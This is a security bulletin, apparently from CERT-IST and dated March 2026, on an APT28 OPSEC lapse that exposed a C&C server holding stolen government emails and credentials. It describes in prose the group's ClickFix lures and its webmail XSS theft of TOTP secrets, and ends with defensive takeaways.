APT28 OPSEC blunder exposes espionage operations targeting European entities

Date : March 07, 2026

In March 2026, researchers from Hunt.io and then Ctrl-Alt-Intel uncovered an operational security (OPSEC) mistake made by the APT28 group, also known as FancyBear, Forest Blizzard, Sednit or Sofacy (see our ATK sheet CERT-IST/ATK-2016-013). This group is linked to Russia's military intelligence directorate (GRU, unit 26165).

The mistake is simple but far-reaching: APT28 operators left open directories exposed on the Internet on a command and control (C&C) server. This server was already known to the Ukrainian government CERT (CERT-UA) since October 2024, yet the group continued to use it for over 500 days without rotating its infrastructure.

The scope of the exposed content is quite substantial: C&C server source code, exploitation payloads, telemetry logs, and most importantly exfiltrated data: over 2,800 government and military emails, approximately 240 sets of credentials (including TOTP secrets used for multi-factor authentication) and more than 11,500 contact addresses. The identified victims are government and military entities in Ukraine, Romania, Bulgaria, Greece, Serbia and North Macedonia, several of which are NATO members.

Observed tactics

The exposed infrastructure reveals two distinct methods used by APT28 to compromise its targets:

The first relies on spear-phishing campaigns using ClickFix lures (fake CAPTCHA pages) that trick the victim into running a command on their workstation, triggering the download of a Metasploit implant.

The second targets Roundcube and SquirrelMail webmail platforms through malicious JavaScript injection (XSS). The code executes within the victim's authenticated session and performs two actions: first, it silently extracts the TOTP secret configured in the authentication plugin, enabling the attacker to generate valid 2FA codes at any time without physical access to the victim's device. Second, it leverages the ManageSieve protocol to create a forwarding rule that silently copies all incoming emails to an attacker-controlled address. This rule persists even after the initial XSS vector is closed, providing long-term access to the victim's communications.

Key takeaways

This inadvertent exposure provides a rare window into the inner workings of a state-sponsored espionage operation. Several lessons can be drawn:

  1. First, even groups considered highly capable make basic mistakes. The fact that APT28 used the same server for over 500 days, despite it having been publicly attributed, challenges the common assumption that state-level attack infrastructure is quickly rotated.
  2. Second, the technique of stealing TOTP secrets via XSS highlights a significant limitation of TOTP-based multi-factor authentication: if the web environment where the secret is configured is compromised, 2FA can be bypassed transparently and persistently.
  3. Finally, for defenders, this case underscores the importance of hardening and monitoring self-hosted webmail platforms (Roundcube, SquirrelMail), regularly auditing ManageSieve filtering rules for unauthorized forwarding, and more broadly not treating 2FA as an absolute safeguard when the underlying application is itself vulnerable.

For more information

Previous Previous Next Next Print Print